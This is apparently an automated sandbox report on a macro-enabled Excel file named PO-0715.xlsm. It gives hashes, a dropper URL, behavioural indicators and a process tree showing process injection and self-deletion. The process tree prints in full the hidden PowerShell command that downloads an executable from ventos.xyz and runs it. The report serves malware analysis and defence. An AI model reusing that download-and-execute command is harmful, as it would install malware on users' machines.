Analysis
-
max time kernel
147s -
max time network
117s -
platform
windows7_x64 -
resource
win7 -
submitted
19-07-2020 09:41
Static task
static1
Behavioral task
behavioral1
Sample
PO-0715.xlsm
Resource
win7
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
PO-0715.xlsm
Resource
win10
windows10_x64
0 signatures
0 seconds
General
-
Target
PO-0715.xlsm
-
Size
92KB
-
MD5
d89a828241cd67ebdc96a905e5924f24
-
SHA1
90ef404e139164b266d553a5e094b01c0e810b4f
-
SHA256
dd07e4b225894da846f284566118ccc96a2aabca90c24337f36ddcc7066eeef4
-
SHA512
7b83617ed1b56eb3181ddf2a7bd9b9122eae6844cf881312fb2f8c1dc1cf62d92ac2a48b841235978d4f68ea59417009e85095eaabb97859b5e67989e86df6c5
Malware Config
Extracted
Language
ps1
Source
URLs
exe.dropper
http://ventos.xyz/hen.exe
Signatures
-
Suspicious use of SetWindowsHookEx 5 IoCs
pid Process 1448 EXCEL.EXE 1448 EXCEL.EXE 1448 EXCEL.EXE 1448 EXCEL.EXE 1448 EXCEL.EXE -
Suspicious use of WriteProcessMemory 22 IoCs
description pid Process procid_target PID 1448 wrote to memory of 1128 1448 EXCEL.EXE 24 PID 1448 wrote to memory of 1128 1448 EXCEL.EXE 24 PID 1448 wrote to memory of 1128 1448 EXCEL.EXE 24 PID 1128 wrote to memory of 1872 1128 powershell.exe 27 PID 1128 wrote to memory of 1872 1128 powershell.exe 27 PID 1128 wrote to memory of 1872 1128 powershell.exe 27 PID 1128 wrote to memory of 1872 1128 powershell.exe 27 PID 1872 wrote to memory of 1548 1872 putty.exe 28 PID 1872 wrote to memory of 1548 1872 putty.exe 28 PID 1872 wrote to memory of 1548 1872 putty.exe 28 PID 1872 wrote to memory of 1548 1872 putty.exe 28 PID 1872 wrote to memory of 1548 1872 putty.exe 28 PID 1872 wrote to memory of 1548 1872 putty.exe 28 PID 1872 wrote to memory of 1548 1872 putty.exe 28 PID 1548 wrote to memory of 844 1548 putty.exe 31 PID 1548 wrote to memory of 844 1548 putty.exe 31 PID 1548 wrote to memory of 844 1548 putty.exe 31 PID 1548 wrote to memory of 844 1548 putty.exe 31 PID 844 wrote to memory of 1488 844 cmmon32.exe 32 PID 844 wrote to memory of 1488 844 cmmon32.exe 32 PID 844 wrote to memory of 1488 844 cmmon32.exe 32 PID 844 wrote to memory of 1488 844 cmmon32.exe 32 -
Suspicious behavior: EnumeratesProcesses 23 IoCs
pid Process 1128 powershell.exe 1872 putty.exe 1872 putty.exe 1872 putty.exe 1548 putty.exe 1548 putty.exe 1548 putty.exe 844 cmmon32.exe 844 cmmon32.exe 844 cmmon32.exe 844 cmmon32.exe 844 cmmon32.exe 844 cmmon32.exe 844 cmmon32.exe 844 cmmon32.exe 844 cmmon32.exe 844 cmmon32.exe 844 cmmon32.exe 844 cmmon32.exe 844 cmmon32.exe 844 cmmon32.exe 844 cmmon32.exe 844 cmmon32.exe -
Suspicious behavior: MapViewOfSection 6 IoCs
pid Process 1548 putty.exe 1548 putty.exe 1548 putty.exe 1548 putty.exe 844 cmmon32.exe 844 cmmon32.exe -
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Explorer.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 1448 EXCEL.EXE -
Blacklisted process makes network request 1 IoCs
flow pid Process 5 1128 powershell.exe -
Suspicious use of SendNotifyMessage 4 IoCs
pid Process 1312 Explorer.EXE 1312 Explorer.EXE 1312 Explorer.EXE 1312 Explorer.EXE -
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process 1128 1448 powershell.exe 23 -
Loads dropped DLL 1 IoCs
pid Process 1872 putty.exe -
Suspicious use of SetThreadContext 4 IoCs
description pid Process procid_target PID 1872 set thread context of 1548 1872 putty.exe 28 PID 1548 set thread context of 1312 1548 putty.exe 20 PID 1548 set thread context of 1312 1548 putty.exe 20 PID 844 set thread context of 1312 844 cmmon32.exe 20 -
Suspicious use of FindShellTrayWindow 5 IoCs
pid Process 1312 Explorer.EXE 1312 Explorer.EXE 1312 Explorer.EXE 1312 Explorer.EXE 1312 Explorer.EXE -
Office loads VBA resources, possible macro or embedded object present
-
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 1128 powershell.exe Token: SeDebugPrivilege 1872 putty.exe Token: SeDebugPrivilege 1548 putty.exe Token: SeDebugPrivilege 844 cmmon32.exe -
Executes dropped EXE 2 IoCs
pid Process 1872 putty.exe 1548 putty.exe
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Checks whether UAC is enabled
- Suspicious use of SendNotifyMessage
- Suspicious use of FindShellTrayWindow
PID:1312 -
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\PO-0715.xlsm2⤵
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
- Suspicious behavior: AddClipboardFormatListener
PID:1448 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://ventos.xyz/hen.exe',$env:Temp+'\putty.exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\putty.exe')3⤵
- Suspicious use of WriteProcessMemory
- Suspicious behavior: EnumeratesProcesses
- Blacklisted process makes network request
- Process spawned unexpected child process
- Suspicious use of AdjustPrivilegeToken
PID:1128 -
C:\Users\Admin\AppData\Local\Temp\putty.exe"C:\Users\Admin\AppData\Local\Temp\putty.exe"4⤵
- Suspicious use of WriteProcessMemory
- Suspicious behavior: EnumeratesProcesses
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Executes dropped EXE
PID:1872 -
C:\Users\Admin\AppData\Local\Temp\putty.exe"C:\Users\Admin\AppData\Local\Temp\putty.exe"5⤵
- Suspicious use of WriteProcessMemory
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Executes dropped EXE
PID:1548 -
C:\Windows\SysWOW64\cmmon32.exe"C:\Windows\SysWOW64\cmmon32.exe"6⤵
- Suspicious use of WriteProcessMemory
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:844 -
C:\Windows\SysWOW64\cmd.exe/c del "C:\Users\Admin\AppData\Local\Temp\putty.exe"7⤵PID:1488
-
-
-
-
-
-